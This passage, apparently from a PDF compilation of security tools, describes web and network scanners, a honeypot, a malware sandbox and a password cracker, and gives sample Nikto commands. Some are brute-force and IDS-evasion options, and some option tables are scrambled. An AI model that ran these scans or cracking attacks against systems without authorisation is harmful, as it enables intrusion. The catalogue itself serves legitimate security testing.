attacks.
Even if your application is not using JSONP you can be still
vulnerable to these type of attacks in other forms, hence why it
is always important to scan your website with Netsparker.
Other Netsparker Desktop 4 Features and Product
Improvements
The above list just highlights the most prominent features and
new security checks of Netsparker Desktop version 4, the only
false positive free web application security scanner. Included in
this version there are also more new security checks and we
also improved several existing security checks, hence the
scanners coverage is better than ever before. Of course we
also included a number of product improvements.
Since there have been a good number of improvements and
changes in this version there are also some things from older
versions of Netsparker which are no longer supported, such as
scan profiles. Because we changed the way Netsparker saves
the scan profiles, scan profiles generated with older versions of
Netsparker will no longer work. Therefore I recommend you to
check the Netsparker Desktop version 4 changelog for more
information on what is new, changed and improved.
NETSPARKER CLOUD - ONLINE WEB APPLICATION

SECURITY SCANNER
Netsparker Cloud is an online web application security scanner

built around the advanced scanning technology of Netsparker
Web Application Security Scanner; the only false positive free
automated desktop based web vulnerability scanner.
Benefit from the Cloud
AFFORDABLE AND MAINTENANCE FREE WEB

APPLICATION SECURITY SOLUTION
Embrace the benefits of the cloud! With Netsparker Cloud you
do not need to buy, license, install and support any hardware or
software. Simply pay a yearly fee and launch as many web
application security scans as you want from anywhere using
the web based portal.
SCALABLE AND ALWAYS AVAILABLE: SCAN AS MANY
WEBSITES AS YOU WANT WHEN YOU WANT
Netsparker Cloud enables you to launch as many web

application security and vulnerability scans as you want within
just minutes, thus allowing you to boost your productivity and
easily stay a step ahead of malicious attackers.
A new vulnerability such as Heartbleed or Shellshock is being
exploited in the wild and you need to scan 500, or 1000 web
applications in just a few hours? You have new web
applications that you need to add to your extensive scanning
program? No need to setup any additional hardware and
software or call in an emergency team, just login to Netsparker
Cloud web portal and launch the web security scans.
Other Netsparker Cloud Features Organizations Can Benefit From:
FULLY CONFIGURABLE ONLINE WEB VULNERABILITY

SCANNER
Netsparker Cloud is fully configurable, just like the desktop
version of Netsparker. You can configure every single detail of
the web application security scan including scan policies, attack
options, HTTP options, URL rewrite rules, authentication
options and everything else.
EASILY INTEGRATE WEB SECURITY SCANNING IN YOUR
SDLC
Netsparker Cloud has a web service based API that allows you
to remotely trigger new web security scans and much more
from anywhere and anytime. Such API enables organizations to
easily integrate web application security scans in their
development environment so they can launch security scans
throughout every stage of the software development lifecycle.

TEAM AND ENTERPRISE LEVEL COLLABORATION MADE
EASY
You can add multiple users with different privileges to the same
Netsparker Cloud account, thus allowing everyone in the
organization to easily collaborate and share all the findings to
streamline the process of securing web applications.
CORRELATED TRENDING REPORTS HELP YOU KEEP
TRACK OF WEB APPLICATION PROJECTS
Web applications are constantly evolving; new features,
functionality and improvements are the order of the day to
ensure they continuously meet all business requirements.
Though such changes also open up new security issues.
Netsparker Cloud security dashboard allows you to easily keep
an eye on the state of security of all web applications while the
trending reports will help you keep track of the quality of work
your developers are doing. Trending reports can also help you
monitor who is improving so you can better assign tasks
according to each of the developers skills.
Try Netsparker Cloud

NIKTO2 - WEB SERVER SCANNER
Nikto is an Open Source (GPL) web server scanner which

performs comprehensive tests against web servers for multiple
items, including over 6700 potentially dangerous files/
programs, checks for outdated versions of over 1250 servers,
and version specific problems on over 270 servers. It also
checks for server configuration items such as the presence of
multiple index files, HTTP server options, and will attempt to
identify installed web servers and software. Scan items and
plugins are frequently updated and can be automatically
updated.
Nikto is not designed as a stealthy tool. It will test a web server
in the quickest time possible, and is obvious in log files or to an
IPS/IDS. However, there is support for LibWhisker's anti-IDS
methods in case you want to give it a try (or test your IDS
system).
Not every check is a security problem, though most are. There
are some items that are "info only" type checks that look for
things that may not have a security flaw, but the webmaster or
security engineer may not know are present on the server.
These items are usually marked appropriately in the information

printed. There are also some checks for unknown items which
have been seen scanned for in log files.
Features
Here are some of the major features of Nikto. See the

documentation for a full list of features and how to use them.
SSL Support (Unix with OpenSSL or maybe Windows with
ActiveState'sPerl/NetSSL)
Full HTTP proxy support
Checks for outdated server components
Save reports in plain text, XML, HTML, NBE or CSV
Template engine to easily customize reports
Scan multiple ports on a server, or multiple servers via
input file (including nmap output)
LibWhisker's IDS encoding techniques
Easily updated via command line
Identifies installed software via headers, favicons and files
Host authentication with Basic and NTLM
Subdomain guessing
Apache and cgiwrap username enumeration
Mutation techniques to "fish" for content on web servers
Scan tuning to include or exclude entire classes of
vulnerabilitychecks
Guess credentials for authorization realms (including
many default id/pw combos)
Authorization guessing handles any directory, not just the
rootdirectory
Enhanced false positive reduction via multiple methods:
headers,page content, and content hashing
Reports "unusual" headers seen
Interactive status, pause and changes to verbosity
settings
Save full request/response for positive tests
Replay saved positive requests
Maximum execution time per target

Auto-pause at a specified time
Checks for common "parking" sites
Logging to Metasploit
Thorough documentation
Basic usage
Options:
-ask+
Whether to ask about
submitting updates
yes
Ask about each
no
Don't ask, don't
auto
Don't ask, just send
(default)
send
-Cgidirs+
Scan these CGI dirs: "none",
"all", or values like "/cgi/ /cgi-a/"

-config+
Use this config file
-Display+
Turn on/off display outputs:

1
Show redirects
Show cookies
Show all 200/OK
Show URLs which
Debug output
Display all HTTP
Print progress to
Scrub output of IPs
received
responses
require authentication
errors
STDOUT
and hostnames
V
-dbcheck
Verbose output
Check database and other key
files for syntax errors

-evasion+
Encoding technique:
1
Random URI encoding
Directory self-
Premature URL ending
Prepend long random
Fake parameter
TAB as request
Change the case of
Use Windows
Use a carriage
(non-UTF8)
reference (/./)
string
spacer
the URL
directory separator (\)
return (0x0d) as a request spacer
B
Use binary value
0x0b as a request spacer

-Format+
Save file (-o) format:

csv
Comma-separated-
htm
HTML Format
msf+
Log to Metasploit
nbe
Nessus NBE format
txt
Plain text
value
xml
XML Format
(if not specified the

format will be taken from the file extension passed to output)
-Help
Extended help information
-host+
Target host
-IgnoreCode
Ignore Codes--treat as negative
responses
-id+
Host authentication to use,
format is id:pass or id:pass:realm

-key+
Client certificate key file
-list-plugins
List all available plugins,
perform no testing
-maxtime+
Maximum testing time per host
-mutate+
Guess additional file names:

1
Test all files with
Guess for password
Enumerate user names
all root directories

file names
via Apache (/~user type requests)
4
Enumerate user names
via cgiwrap (/cgi-bin/cgiwrap/~user type requests)

5
Attempt to brute
force sub-domain names, assume that the host name is the

parent domain
6
Attempt to guess
directory names from the supplied dictionary file

-mutate-options
Provide information for mutates
-nointeractive
Disables interactive features
-nolookup
Disables DNS lookups
-nossl
Disables the use of SSL
-no404
Disables nikto attempting to
guess a 404 page

-output+
Write output to this file ('.'
for auto-name)
-Pause+
Pause between tests (seconds,
integer or float)
-Plugins+
List of plugins to run
(default: ALL)
-port+
Port to use (default 80)
-RSAcert+
Client certificate file
-root+
Prepend root value to all
requests, format is /directory

-Save
Save positive responses to this
directory ('.' for auto-name)

-ssl
Force ssl mode on port
-Tuning+
Scan tuning:
1
Interesting File /
Misconfiguration /
Information
Injection (XSS/
Remote File
Denial of Service
Remote File
Seen in logs
Default File
Disclosure
Script/HTML)
Retrieval - Inside Web Root
Retrieval - Server Wide

8
Command Execution /
SQL Injection
File Upload
Authentication
Software
Remote Source
Reverse Tuning
Remote Shell
Bypass
Identification
Inclusion
Options (i.e., include all except specified)
-timeout+
Timeout for requests (default
10 seconds)
-Userdbs
Load only user databases, not
the standard databases

all
Disable standard dbs
and load only user dbs

tests Disable only
db_tests and load udb_tests
-until
Run until the specified time or
duration
-update
Update databases and plugins
from CIRT.net
-useproxy
Use the proxy defined in
nikto.conf
-Version
Print plugin and database
versions
-vhost+
Virtual host (for Host header)
+ requires a value
Basic Testing
The most basic Nikto scan requires simply a host to target,

since port 80 is assumed if none is specified. The host can
either be an IP or a hostname of a machine, and is specified
using the -h (-host) option. This will scan the IP 192.168.0.1
on TCP port 80:
perl nikto.pl -h 192.168.0.1
To check on a different port, specify the port number with the p (-port) option. This will scan the IP 192.168.0.1 on TCP port
443:
perl nikto.pl -h 192.168.0.1 -p 443
Hosts, ports and protocols may also be specified by using a full

URL syntax, and it will be scanned:
perl nikto.pl -h https://192.168.0.1:443/
There is no need to specify that port 443 may be SSL, as Nikto

will first test regular HTTP and if that fails, HTTPS. If you are
sure it is an SSL server, specifying -s(-ssl) will speed up the
test.
perl nikto.pl -h 192.168.0.1 -p 443 -ssl
More complex tests can be performed using the -mutate

parameter, as detailed later. This can produce extra tests,
some of which may be provided with extra parameters through
the -mutate-options parameter. For example, using -mutate
3, with or without a file attempts to brute force usernames if the
web server allows ~user URIs:
perl nikto.pl -h 192.168.0.1 -mutate 3 -mutate-options
user-list.txt
Multiple Port Testing
Nikto can scan multiple ports in the same scanning session. To
test more than one port on the same host, specify the list of
ports in the -p (-port) option. Ports can be specified as a
range (i.e., 80-90), or as a comma-delimited list, (i.e.,
80,88,90). This will scan the host on ports 80, 88 and 443.
perl nikto.pl -h 192.168.0.1 -p 80,88,443
DownloadNikto2
NIPE - SCRIPT TO REDIRECT ALL TRAFFIC FROM THE
MACHINE TO THE TOR NETWORK
Script to redirect all the traffic from the machine to the Tor
network.
[+] AUTOR:
Vinicius Gouvea
[+] EMAIL:
vini@inploit.com
[+] BLOG:
https://medium.com/viniciusgouvea
[+] GITHUB:
https://github.com/HeitorG
[+] FACEBOOK:
https://fb.com/viniciushgouvea
Installing:
git clone https://github.com/HeitorG/nipe

cd nipe
cpan install
strict warnings Switch
Commands:
COMMAND
FUNCTION
install
For install.
start
To start
stop
To stop
Tested on:
Ubuntu 14.10 and 15.04
Busen Labs Hydrogen
Debian Jessie 8.1 and Wheezy 7.9
Lubuntu 15.04
Xubuntu 15.04
LionSec 3.0
Download Nipe
NIPPER - TOOLKIT WEB SCAN FOR ANDROID
La Primera herramienta de escner de vulnerabilidades WEB,

En entorno Android (Versin para iOS en desarrollo), este
escner de vulnerabilidad fue enfocado para CMS ms usadas,
(WordPress, Drupal, Joomla. Blogger ).
En su primera versin Nipper cuenta con 10 mdulos distintos,
para recopilar informacin acerca de un URL en especfica.
Su interfaz ha sido pensada para que tan solo con unos
toques en su interfaz extraeras gran parte de su informacin.
Mdulos Disponibles:
IP Server
CMS Detect & Version
DNS Lookup
Nmap ports IP SERVER
Enumeration Users
Enumeration Plugins
Find Exploit Core CMS
Find Exploit DB
CloudFlare Resolver
Nipper NO requiere ROOT, tan solo requiere permiso a
internet.
Compatible desde 2.3 a Android L.
DownloadNipper
NMAP 7 - SECURITY SCANNER FOR NETWORK
EXPLORATION & SECURITY AUDITS
Nmap (Network Mapper) is a free and open source (license)

utility for network discovery and security auditing. Many
systems and network administrators also find it useful for
network inventory, managing service upgrade schedules,

monitoring host or service uptime, and many other tasks. Nmap
uses raw IP packets in novel ways to determine what hosts are
available on the network, what services (application name and
version) those hosts are offering, what operating systems (and
OS versions) they are running, what type of packet filters/
firewalls are in use, and dozens of other characteristics. It was
designed to rapidly scan large networks, but works fine against
single hosts. Nmap runs on all major computer operating
systems, and official binary packages are available for Linux,
Windows, and Mac OS X. In addition to the classic commandline Nmap executable, the Nmap suite includes an advanced
GUI and results viewer (Zenmap), a flexible data transfer,
redirection, and debugging tool (Ncat), a utility for comparing
scan results (Ndiff), and a packet generation and response
analysis tool (Nping).
Nmap was named Security Product of the Year by Linux
Journal, Info World, LinuxQuestions.Org, and Codetalker
Digest. It was even featured in nineteen movies and TV series,
including The Matrix Reloaded, The Bourne Ultimatum. Girl
with the Dragon Tattoo, Dredd, Elysium, and Die Hard 4. Nmap
was released to the public in 1997 and has earned the trust of
millions of users.
Top 7 Improvements in Nmap 7
Before we get into the detailed changes, here are the top 7
improvements in Nmap 7:
1. Major Nmap Scripting Engine (NSE) Expansion
As the Nmap core has matured, more and more new
functionality is developed as part of our NSE subsystem
instead. In fact, we've added 171 new scripts and 20 libraries
since Nmap 6. Exmaples include firewall-bypass, supermicroipmi-conf, oracle-brute-stealth, and ssl-heartbleed. And NSE is
now powerful enough that scripts can take on core functions
such as host discovery (dns-ip6-arpa-scan), version scanning

(ike-version, snmp-info, etc.), and RPC grinding (rpc-grind).
There's even a proposal to implement port scanning in NSE.
[More Details]
2. Mature IPv6 support
IPv6 scanning improvements were a big item in the Nmap 6
release, but Nmap 7 outdoes them all with full IPv6 support for
CIDR-style address ranges, Idle Scan, parallel reverse-DNS,
and more NSE script coverage. [More Details]
3. Infrastructure Upgrades
We may be an 18-year-old project, but that doesn't mean we'll
stick with old, crumbling infrastructure! The Nmap Project
continues to adopt the latest technologies to enhance the
development process and serve a growing user base. For
example, we converted all of Nmap.Org to SSL to reduce the
risk of trojan binaries and reduce snooping in general. We've
also been using the Git version control system as a larger part
of our workflow and have an official Github mirror of the Nmap
Subversion source repository and we encourage code
submissions to be made as Github pull requests. We also
created an official bug tracker which is also hosted on Github.
Tracking bugs and enhancement requests this way has already
reduced the number which fall through the cracks. [More
Details]
4. Faster Scans
Nmap has continually pushed the speed boundaries of
synchronous network scanning for 18 years, and this release is
no exception. New Nsock engines give a performance boost to
Windows and BSD systems, target reordering prevents a nasty
edge case on multihomed systems, and NSE tweaks lead to
much faster -sV scans. [More Details]
5. SSL/TLS scanning solution of choice
Transport Layer Security (TLS) and its predecessor, SSL, are

the security underpinning of the web, so when big
vulnerabilities like Heartbleed, POODLE, and FREAK come
calling, Nmap answers with vulnerability detection NSE scripts.
The ssl-enum-ciphers script has been entirely revamped to
perform fast analysis of TLS deployment problems, and version
scanning probes have been tweaked to quickly detect the
newest TLS handshake versions. [More Details]
6. Ncat Enhanced
We are excited and proud to announce that Ncat has been
adopted by the Red Hat/Fedora family of distributions as the
default package to provide the "netcat" and "nc" commands!
This cooperation has resulted in a lot of squashed bugs and
enhanced compatibility with Netcat's options. Also very exciting
is the addition of an embedded Lua interpreter for creating
simple, cross-platform daemons and traffic filters.
7. Extreme Portability
Nmap is proudly cross-platform and runs on all sorts of esoteric
and archaic systems. But our binary distributions have to be
kept up-to-date with the latest popular operating systems.
Nmap 7 runs cleanly on Windows 10 all the way back to
Windows Vista. By popular request, we even built it to run on
Windows XP, though we suggest those users upgrade their
systems. Mac OS X is supported from 10.8 Mountain Lion
through 10.11 El Capitan. Plus, we updated support for Solaris
and AIX. And Linux usersyou have it easy.
Download Nmap 7
NOPO - NOSQL HONEYPOT FRAMEWORK
NoSQL-Honeypot-Framework (NoPo) is an open source

honeypot for nosql databases that automates the process of
detecting attackers,logging attack incidents. The simulation
engines are deployed using the twisted framework.Currently
the framework holds support for redis.
N.B : The framework is under development and is prone to
bugs
Installation
You can download NoPo by cloning the Git repository:

git clone https://github.com/torque59/nosqlpot.git
NoPo works out of the box with Python version 2.6.x and 2.7.x
on any platform.
Added Features:
First Ever Honeypot for NoSQL Databases
Support For Config Files

Simulates Protocol Specification as of Servers
Support for Redis
Usage
Get a list of basic options :

python nopo.py -h
Deploy an nosql engine:

python nopo.py -deploy redis
Deploy an nosql engine with a configuration file:

python nopo.py -deploy redis -config filename
Log commands,session to file :

python nopo.py -deploy redis -out log.out
Download NoPo
NORIBEN - YOUR PERSONAL, PORTABLE MALWARE
SANDBOX
Noriben is a Python-based script that works in conjunction with

Sysinternals Procmon to automatically collect, analyze, and
report on runtime indicators of malware. In a nutshell, it allows
you to run your malware, hit a keypress, and get a simple text
report of the sample's activities.

Noriben allows you to not only run malware similar to a
sandbox, but to also log system-wide events while you
manually run malware in ways particular to making it run. For
example, it can listen as you run malware that requires varying
command line options. Or, watch the system as you step
through malware in a debugger.
Noriben only requires Sysinternals procmon.exe (or
procmon64.exe) to operate. It requires no pre-filtering (though it
would greatly help) as it contains numerous white list items to
reduce unwanted noise from system activity.
Cool Features
If you have a folder of YARA signature files, you can specify it
with the --yara option. Every new file create will be scanned
against these signatures with the results displayed in the output
results.
If you have a VirusTotal API, place it into a file named
"virustotal.api" (or embed directly in the script) to auto-submit
MD5 file hashes to VT to get the number of viral results.
You can add lists of MD5s to auto-ignore (such as all of your
system files). Use md5deep and throw them into a text file, use
--hash to read them.
You can automate the script for sandbox-usage. Using -t to
automate execution time, and --cmd "path\exe" to specify a
malware file, you can automatically run malware, copy the
results off, and then revert to run a new sample.
The --generalize feature will automatically substitute absolute
paths with Windows environment paths for better IOC
development. For example, C:\Users\malware_user\AppData

\Roaming\malware.exe will be automatically resolved to
%AppData%\malware.exe.
Usage:
--===[ Noriben v1.6 ]===---===[
@bbaskin
]===--
usage: Noriben.py [-h] [-c CSV] [-p PML] [-f FILTER] [-hash HASH]
[-t TIMEOUT] [--output OUTPUT] [--yara
YARA] [--generalize]
[--cmd CMD] [-d]
optional arguments:
-h, --help
-c CSV, --csv CSV
Re-analyze an existing Noriben
CSV file
-p PML, --pml PML
Re-analyze an existing Noriben
PML file
-f FILTER, --filter FILTER
Specify alternate Procmon Filter
PMC
--hash HASH
Specify MD5 file whitelist
-t TIMEOUT, --timeout TIMEOUT

Number of seconds to collect
activity
--output OUTPUT
Folder to store output files
--yara YARA
Folder containing YARA rules
--generalize
Generalize file paths to their
environment variables.
Default: True
--cmd CMD
Command line to execute (in
quotes)
-d
Enable debug tracebacks
Download Noriben
NSEARCH - NMAP SCRIPT ENGINE SEARCH
NSEarch is a tool that helps you find scripts that are used nmap
(NSE) , can be searched using the name or category , it is also
possible to see the documentation of the scripts found.
USAGE:
$ python nsearch.py
Main Menu
Initial Setup
================================================
_
_____
| \ | |/
|
_____
___||
___|
\| |\ `--. | |__
| . ` | `--. \|
| |\
| |
__ _
__|
_ __
___ | |__
/ _` || '__| / __|| '_ \
|/\__/ /| |___ | (_| || |
\_| \_/\____/ \____/
\__,_||_|
| (__ | | | |
\___||_| |_|
================================================
Version 0.3
@jjtibaquira
================================================
Creating Database :nmap_scripts.sqlite3
Creating Table For Script ....
Creating Table for Categories ....
Creating Table for Scripts per Category ....
Upload Categories to Categories Table ...
Main Console
================================================
_
_____
| \ | |/
|
_____
___||
___|
\| |\ `--. | |__
| . ` | `--. \|
| |\
__|
| |
__ _
_ __
/ _` || '__| / __|| '_
|/\__/ /| |___ | (_| || |
\_| \_/\____/ \____/
___ | |__
\__,_||_|
| (__ | | | |
\___||_| |_|
================================================
Version 0.3
@jjtibaquira
================================================
nsearch>
Basic Commands
================================================
_
_____
| \ | |/
|
_____
___||
___|
\| |\ `--. | |__
| . ` | `--. \|
| |\
| |
__ _
__|
_ __
___ | |__
/ _` || '__| / __|| '_
|/\__/ /| |___ | (_| || |
\_| \_/\____/ \____/
| (__ | | | |
\__,_||_|
\___||_| |_|
================================================
Version 0.3
@jjtibaquira
================================================
nsearch> help
Nsearch Commands
================
clear
doc
exit
help
history
last
search
nsearch>
================================================
_
_____
| \ | |/
|
_____
___||
___|
\| |\ `--. | |__
| . ` | `--. \|
| |\
__|
| |
__ _
_ __
/ _` || '__| / __|| '_
|/\__/ /| |___ | (_| || |
\_| \_/\____/ \____/
___ | |__
\__,_||_|
| (__ | | | |
\___||_| |_|
================================================
Version 0.3
@jjtibaquira
================================================
nsearch> help search

name
: Search by script's name
category : Search by category

Usage:
search name:http
search category:exploit
nsearch>
================================================
_
_____
| \ | |/
|
_____
___||
___|
| |
\| |\ `--. | |__
| . ` | `--. \|
| |\
__ _
__|
_ __
___ | |__
/ _` || '__| / __|| '_
|/\__/ /| |___ | (_| || |
\_| \_/\____/ \____/
\__,_||_|
| (__ | | | |
\___||_| |_|
================================================
Version 0.3
@jjtibaquira
================================================
nsearch> search name:ssh
1.ssh-hostkey.nse
2.ssh2-enum-algos.nse
3.sshv1.nse
nsearch>
================================================
_
| \ | |/
|
_____
___||
_____
___|
\| |\ `--. | |__
| |
__ _
_ __
___ | |__
| . ` | `--. \|
| |\
__|
/ _` || '__| / __|| '_
|/\__/ /| |___ | (_| || |
\_| \_/\____/ \____/
\__,_||_|
| (__ | | | |
\___||_| |_|
================================================
Version 0.3
@jjtibaquira
================================================
nsearch> doc ssh <TAB>
ssh-hostkey.nse
ssh2-enum-algos.nse
sshv1.nse
nsearch> doc sshv1.nse

local nmap = require "nmap"
local shortport = require "shortport"
local string = require "string"
description = [[
Checks if an SSH server supports the obsolete and
less secure SSH Protocol Version 1.
]]
author = "Brandon Enright"
nsearch>
DownloadNSEarch
OCLHASHCAT V2.01 - WORLDS FASTEST PASSWORD
CRACKER
oclHashcat is the world's fastest and most advanced GPGPUbased password recovery utility, supporting five unique modes
of attack for over 170 highly-optimized hashing algorithms.
oclHashcat currently supports AMD (OpenCL) and Nvidia
(CUDA) graphics processors on GNU/Linux and Windows
7/8/10, and has facilities to help enable distributed password
cracking.
FEATURES
Worlds fastest password cracker

Worlds first and only GPGPU based rule engine
Free
Open-Source
Multi-GPU (up to 128 gpus)
Multi-Hash (up to 100 million hashes)
Multi-OS (Linux & Windows native binaries)
Multi-Platform (OpenCL & CUDA support)
Multi-Algo (see below)
Low resource utilization, you can still watch movies or
play games while cracking
Focuses highly iterated modern hashes
Focuses dictionary based attacks
Supports distributed cracking
Supports pause / resume while cracking
Supports sessions
Supports restore
Supports reading words from file
Supports reading words from stdin
Supports hex-salt
Supports hex-charset
Built-in benchmarking system
Integrated thermal watchdog
... and much more
ATTACK-MODES
Straight *
Combination
Brute-force
Hybrid dict + mask
Hybrid mask + dict
* accept Rules
ALGORITHMS
MD4
MD5
Half MD5 (left, mid, right)
SHA1
SHA-256
SHA-384
SHA-512
SHA-3 (Keccak)
SipHash
RipeMD160
Whirlpool
GOST R 34.11-94
GOST R 34.11-2012 (Streebog) 256-bit
GOST R 34.11-2012 (Streebog) 512-bit
Double MD5
Double SHA1
md5($pass.$salt)
md5($salt.$pass)
md5(unicode($pass).$salt)
md5($salt.unicode($pass))
md5(sha1($pass))
md5($salt.md5($pass))
md5($salt.$pass.$salt)
md5(strtoupper(md5($pass)))
sha1($pass.$salt)
sha1($salt.$pass)
sha1(unicode($pass).$salt)
sha1($salt.unicode($pass))
sha1(md5($pass))
sha1($salt.$pass.$salt)
sha256($pass.$salt)
sha256($salt.$pass)
sha512($pass.$salt)
sha512($salt.$pass)
HMAC-MD5 (key = $pass)
HMAC-MD5 (key = $salt)
HMAC-SHA1 (key = $pass)
HMAC-SHA1 (key = $salt)
PBKDF2-HMAC-MD5
PBKDF2-HMAC-SHA1
PBKDF2-HMAC-SHA256
PBKDF2-HMAC-SHA512
MyBB
phpBB3
SMF
vBulletin
IPB
Woltlab Burning Board
osCommerce
xt:Commerce
PrestaShop
Mediawiki B type
Wordpress
Drupal
Joomla
PHPS
Django (SHA-1)
Django (PBKDF2-SHA256)
EPiServer
ColdFusion 10+
Apache MD5-APR
MySQL
PostgreSQL
MSSQL
Oracle H: Type (Oracle 7+)
Oracle S: Type (Oracle 11+)
Oracle T: Type (Oracle 12+)
Sybase
hMailServer
DNSSEC (NSEC3)
IKE-PSK
IPMI2 RAKP
iSCSI CHAP
Cram MD5
MySQL Challenge-Response Authentication (SHA1)
PostgreSQL Challenge-Response Authentication (MD5)
SIP Digest Authentication (MD5)
WPA
WPA2
NetNTLMv1
NetNTLMv1 + ESS
NetNTLMv2
Kerberos 5 AS-REQ Pre-Auth etype 23
Netscape LDAP SHA/SSHA
LM
NTLM
Domain Cached Credentials (DCC), MS Cache
Domain Cached Credentials 2 (DCC2), MS Cache 2
MS-AzureSync PBKDF2-HMAC-SHA256
descrypt
bsdicrypt
md5crypt
sha256crypt
sha512crypt
bcrypt
scrypt
OSX v10.4
OSX v10.5
OSX v10.6
OSX v10.7
OSX v10.8
OSX v10.9
OSX v10.10
AIX {smd5}
AIX {ssha1}
AIX {ssha256}
AIX {ssha512}
Cisco-ASA
Cisco-PIX
Cisco-IOS
Cisco $8$
Cisco $9$
Juniper IVE
Juniper Netscreen/SSG (ScreenOS)
Android PIN
GRUB 2
CRC32
RACF
Radmin2
Redmine
Citrix Netscaler
SAP CODVN B (BCODE)
SAP CODVN F/G (PASSCODE)
SAP CODVN H (PWDSALTEDHASH) iSSHA-1
PeopleSoft
Skype
7-Zip
RAR3-hp
PDF 1.1 - 1.3 (Acrobat 2 - 4)
PDF 1.4 - 1.6 (Acrobat 5 - 8)
PDF 1.7 Level 3 (Acrobat 9)
PDF 1.7 Level 8 (Acrobat 10 - 11)
MS Office <= 2003 MD5
MS Office <= 2003 SHA1

MS Office 2007
MS Office 2010
MS Office 2013
Lotus Notes/Domino 5
Bitcoin/Litecoin wallet.dat
Blockchain, My Wallet
1Password, agilekeychain
1Password, cloudkeychain
Lastpass
Password Safe v2
Password Safe v3
eCryptfs
Android FDE <= 4.3
TrueCrypt 5.0+
DownloadoclHashcat v2.01
OPENVAS - THE WORLD'S MOST ADVANCED OPEN
SOURCE VULNERABILITY SCANNER AND MANAGER
The Open Vulnerability Assessment System (OpenVAS) is a

framework of several services and tools. The core of this SSL-
secured service-oriented architecture is the OpenVAS

Scanner. The scanner very efficiently executes the actual
Network Vulnerability Tests (NVTs) which are served with daily
updates via the OpenVAS NVT Feed or via a commercial feed
service.
The OpenVAS Manager is the central service that consolidates

plain vulnerability scanning into a full vulnerability management
solution. The Manager controls the Scanner via OTP
(OpenVAS Transfer Protocol) and itself offers the XML-based,
stateless OpenVAS Management Protocol (OMP). All
intelligence is implemented in the Manager so that it is possible
to implement various lean clients that will behave consistently
e.g. with regard to filtering or sorting scan results. The Manager
also controls a SQL database (sqlite-based) where all
configuration and scan result data is centrally stored. Finally,
Manager also handles user management includiung access

control with groups and roles.
Different OMP clients are available: The Greenbone Security

Assistant (GSA) is a lean web service offering a user interface
for web browsers. GSA uses XSL transformation stylesheet
that converts OMP responses into HTML.
OpenVAS CLI contains the command line tool "omp" which

allows to create batch processes to drive OpenVAS Manager.
Another tool of this package is a Nagios plugin.
Most of the tools listed above share functionality that is

aggregated in the OpenVAS Libraries.
The OpenVAS Scanner offers the communication protocol OTP
(OpenVAS Transfer Protocol) which allows to control the scan
execution. This protocol is subject to be eventually replaced
and thus it is not recommended to develop OTP clients.
FEATURE OVERVIEW
OpenVAS Scanner
Many target hosts are scanned concurrently
OpenVAS Transfer Protocol (OTP)
SSL support for OTP (always)
WMI support (optional)
...
OpenVAS Manager
OpenVAS Management Protocol (OMP)
SQL Database (sqlite) for configurations and scan

results
SSL support for OMP (always)
Many concurrent scans tasks (many OpenVAS

Scanners)
Notes management for scan results
False Positive management for scan results
Scheduled scans
Flexible escalators upon status of a scan task
Stop, Pause and Resume of scan tasks
Master-Slave Mode to control many instances from a

central one
Reports Format Plugin Framework with various

plugins for: XML, HTML, LateX, etc.
User Management
Feed status view
Feed synchronisation
...
Greenbone Security Assistant (GSA)
Client for OMP and OAP
HTTP and HTTPS
Web server on its own (microhttpd), thus no extra

web server required
Integrated online-help system
Multi-language support
...
OpenVAS CLI
Client for OMP
Runs on Windows, Linux, etc.
Plugin for Nagios
...
Download OpenVAS
OWASP ZAP 2.4.0 - PENETRATION TESTING TOOL FOR
TESTING WEB APPLICATIONS
ZAP is an OWASP Flagship project, and is currently the most

active open source web application security tool.
For a quick introduction to the new release see this video:
An error occurred.
Some of the most significant changes include:

ATTACK MODE
A new attack mode has been added that means that

applications that you have specified are in scope are actively
scanned as they are discovered.
ADVANCED FUZZING
A completely new fuzzing dialog has been introduced that
allows multiple injection points to be attacked at the same time,

as well as introducing new attack payloads including the option
to use scripts for generating the payloads as well as pre and
post attack manipulation and analysis.
SCAN POLICIES
Scan policies define exactly which rules are run as part of an

active scan.
They also define how these rules run influencing how many
requests are made and how likely potential issues are to be
flagged.
The new Scan Policy Manager dialog allows you to create,
import and export as many scan policies as you need. You
select any scan policy when you start an active scan and also
specify the one used by the new attack mode.
Scan policy dialog boxes allow sorting by any column, and
include a quality column (indicating if individual scanners are
Release, Beta, or Alpha quality).
SCAN DIALOGS WITH ADVANCED OPTIONS
New Active Scan and Spider dialogs have replaced the

increasing number of right click 'Attack' options. These provide
easy access to all of the most common options and optionally a
wide range of advanced options.
HIDING UNUSED TABS
By default only the essential tabs are now shown when ZAP
starts up.
The remaining tabs are revealed when they are used (e.g. for
the spider and active scanner) or when you display them via
the special tab on the far right of each window with the green '+'
icon. This special tab disappears if there are no hidden tabs.
Tabs can be closed via a small 'x' icon which is shown when
the tab is selected.

Tabs can also be 'pinned' using a small 'pin' icon that is also
shown when the tab is selected - pinned tabs will be shown
when ZAP next starts up.
NEW ADD-ONS
Two significant new alpha quality add-ons are available:

Access Control Testing: adds the ability to automate many
aspects of access control testing.
Sequence Scanning: adds the ability to scan 'sequences'
of web pages, in other words pages that must be visited in
a strict order in order to work correctly.
These can both be downloaded from the ZAP Marketplace.
NEW SCAN RULES
A number of significant new alpha quality scanners are

available:
Relative Path Confusion: Allows ZAP to scan for issues
that may result in XSS, by detecting if the browser can be
fooled into interpreting HTML as CSS.
Proxy Disclosure: Allows ZAP to detect forward and
reverse proxies between the ZAP instance and the origin
web server / application server.
Storability / Cacheability: Allows ZAP to passively
determine whether a page is storable by a shared cache,
and whether it can be served from that cache in response
to a similar request. This is useful from both a privacy and
application performance perspective. The scanner follows
RFC 7234.
Support has also been added for Direct Web Remoting as an
input vector for all scan rules.
CHANGED SCAN RULES
External Redirect: This plugins ID has been changed from

30000 to 20019, in order to more closely align with the
established groupings. (This change may be of
importance to **API Users**). Additionally some minor
changes have been implemented to prevent collisions
between injected values and in-page content, and improve
performance. (Issues: 1529 and 1569)
Session ID in URL Rewrite: This plugin has been updated
with a minimum length check for the value of the
parameters it looks for. A false positive condition was
raised related to this plugin (Issue 1396) whereby sID=5
would trigger a finding. Minimum length for session IDs as
this plugin interprets them is now eight (8) characters.
Client Browser Cache: The active scan rule
TestClientBrowserCache has been removed. Checks
performed by the passive scan rule CacheControlScanner
have been slightly modified. (Issue 1499)
MORE USER INTERFACE CHANGES
The ZAP splash screen is back: It now includes new

graphics, a tips & tricks module, and loading/progress info.
The active scan dialog show the real plugins progress
status based on the number of nodes that need to be
scanned.
There is a new session persistence options dialog that
prompts the user for their preferred settings at startup (you
can choose to Remember the option and not be asked
again).
For all Alerts the Risk field (False Positive, Suspicious,
Warning) has been replaced with a more appropriately
